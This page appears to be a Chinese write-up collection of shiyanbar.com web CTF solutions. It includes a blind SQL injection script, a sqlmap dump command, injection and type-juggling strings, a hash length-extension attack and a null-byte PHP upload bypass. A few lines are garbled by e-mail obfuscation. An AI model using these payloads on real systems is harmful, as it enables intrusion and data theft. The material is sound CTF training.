實驗吧ctf
阿新 • • 發佈:2019-01-07
1/登陸一下好嗎??
http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
='
='
ctf{51d1bf8fb65a8c2406513ee8f52283e7}
import requests
import time
# Candidate characters that the loop below tries at each position of the value.
# NOTE(review): "[email protected]" looks like the placeholder left by a site-side
# e-mail obfuscation filter, so this literal is probably not the author's
# original alphabet; the original characters cannot be recovered from this page.
payloads='[email protected]_.{}-'
# Accumulates the characters confirmed so far, one per position.
flag = ''
def exp(x,i):
    """Time one request that asks whether character ``x`` of the flag equals ``i``.

    The probe is sent in the ``X-FORWARDED-FOR`` request header. Its SQL
    fragment passes the comparison result to ``sleep()``, so a match delays
    the response by about one second and a mismatch does not.

    Returns 1 when the whole round trip took longer than one second, else 0.
    The measurement includes network latency as well as any database delay.

    NOTE(review): the technique only works if the server concatenates this
    header into a SQL statement. Binding the value as a query parameter, and
    not trusting client-supplied forwarding headers, removes the injection
    point.
    """
    starttime = time.time()
    url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
    # Same literal pieces as the original, only split across lines.
    probe = (
        "' or sleep(ascii(mid((select(flag)from(flag))from("
        + str(x)
        + ")for(1)))=ascii('"
        + i
        + "')) and '1'='1"
    )
    request_headers = {
        "Host": "ctf5.shiyanbar.com",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "keep-alive",
        "X-FORWARDED-FOR": probe,
    }
    # The response body is not inspected; only the elapsed time matters.
    requests.get(url, headers=request_headers)
    elapsed = time.time() - starttime
    return 1 if elapsed > 1 else 0
# Walk positions 1..32; at each one keep the first candidate that exp() reports
# as a match (a delayed response) and print the value recovered so far.
for position in range(1, 33):
    matched = next((ch for ch in payloads if exp(position, ch)), None)
    if matched is not None:
        flag += matched
        print(flag)
print('flag:' + flag)
ctf{cdbf14c9551d5be5612f7bb5d2867853}
3/因缺思汀的繞過
http://ctf5.shiyanbar.com/web/pcat/index.php
uname=d%27or 1=1 group by pwd with rollup limit 1 offset 2%23&pwd=
CTF{with_rollup_interesting}
4/簡單的sql注入之3
http://ctf5.shiyanbar.com/web/index_3.php
sqlmap -u 'http://ctf5.shiyanbar.com/web/index_3.php?id=0' -D web1 --tables -T flag --columns --dump
5/簡單的sql注入之2
import requests
import base64
url = 'http://ctf5.shiyanbar.com/web/10/10.php'

# One session is used for both requests, as in the original listing.
s = requests.session()

# The response header named FLAG carries base64 text; its second
# colon-separated field is the value posted back as `key`.
encoded = s.get(url).headers['FLAG']
flag = base64.b64decode(encoded).split(':')[1]

result = s.post(url=url, data={'key': flag})
print(result.text)
root@ubuntu:~/HashPump# hashpump
Input Signature: 571580b26c65f306376d4f64e53cb5c7
Input Data: admin
Input Key Length: 20
Input Data to Add: 123
961a38ded0b8553041ca20dd34e8e189
admin\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x00\x00123
提交內容:
getmein=961a38ded0b8553041ca20dd34e8e189
username=admin&password=admin%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c8%00%00%00%00%00%00%00123
CTF{cOOkieS_4nd_hAshIng_G0_w3LL_t0g3ther}
8/拐彎抹角
http://ctf5.shiyanbar.com/10/indirection/
CTF{PSEDUO_STATIC_DO_YOU_KNOW}
直接訪問得到flag,沒意思。
// Challenge source as shown on the page: the expected PIN is a constant embedded in the script,
// so anyone who can read the source can read the secret.
$a = $_POST["PIN"];
// Loose comparison (==) of request input against a numeric literal.
// NOTE(review): the literal is far outside PHP's integer range, so PHP treats it as a float
// and the comparison is numeric rather than an exact string match. Confirm on the target version.
// A secret check is normally done on strings with a constant-time comparison such as hash_equals().
if ($a == -19827747736161128312837161661727773716166727272616149001823847) {
echo "Congratulations! The flag is $flag";
} else {
echo "User with provided PIN not found.";
}
</pre>Congratulations! The flag is ctf{forms_are_easy}
------WebKitFormBoundaryTx0av8Bu4ovD7Yas
Content-Disposition: form-data; name="username"
admin
------WebKitFormBoundaryTx0av8Bu4ovD7Yas
Content-Disposition: form-data; name="password"
a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
------WebKitFormBoundaryTx0av8Bu4ovD7Yas--
ctf{dwduwkhduw5465}
11/忘記密碼了
http://ctf5.shiyanbar.com/10/upload/
.submit.php.swp
GET /10/upload/submit.php[email protected].com&token=0000000000
flag is SimCTF{huachuan_TdsWX}
/web/more.php?password=1e8%00*-*
Flag: CTF{Ch3ck_anD_Ch3ck}
/web/Session.php?password=
Flag: CTF{Cl3ar_th3_S3ss1on}
/web/false.php?name[]=1&password[]=2
Flag: CTF{t3st_th3_Sha1}
------WebKitFormBoundaryZwg3dXMwcw0wGJHb
Content-Disposition: form-data; name="dir"
/uploads/2.php(注意這裡是16進位制的00) jpg
------WebKitFormBoundaryZwg3dXMwcw0wGJHb
Content-Disposition: form-data; name="file"; filename="2.jpg"
Content-Type: applications/octet-stream
/uploads/8a9e5f6a7a789acb.php<br>恭喜你获得flag一枚:<br>flag{SimCTF_huachuan}</body>
</html>
<?php
// Undo the outer layers in order: ROT13, then string reversal, then base64.
$encoded = "a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$shifted = base64_decode(strrev(str_rot13($encoded)));

// Walk the decoded bytes from last to first, lowering each byte value by one,
// which reverses the string and removes the +1 shift in a single pass.
$plain = "";
$index = strlen($shifted);
while ($index-- > 0) {
    $plain .= chr(ord($shifted[$index]) - 1);
}
echo $plain;
?>
flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}
17/程式邏輯問題
user=' union /*!Select*/ 'c4ca4238a0b923820dcc509a6f75849b'-- - &pass=1
Logged in! Key: SimCTF{youhaocongming}
<script>**</script>
密碼是:Ihatejs
/DUTCTF/index.php?id=%2568%2561%2563%256b%2565%2572%2544%254a
flag: DUTCTF{PHP_is_the_best_program_language}
21/貌似有點難
http://ctf5.shiyanbar.com/phpaudit/
用 Modify Header 新增請求標頭 X-Forwarded-For: 1.1.1.1 即可;用 bp(應指 Burp Suite)新增則無效。伺服端看來是以這個可由用戶端任意填寫的標頭判斷來源 IP,因此它不能當作可信的來源依據。
SimCTF{daima_shengji}
21/頭有點大
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0 .NET CLR 9.9)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-gb,en;q=0.5
The key is:HTTpH34der</p>
22/Forbidden
Accept-Language: zh-hk,zh;q=0.8
KEY:123JustUserAGent
23/貓抓老鼠
Content-Row: MTUwMTE1NjUzNA==
Content-Length: 21
Content-Type: text/html
KEY: #WWWnsf0cus_NET#
24/看起來有點難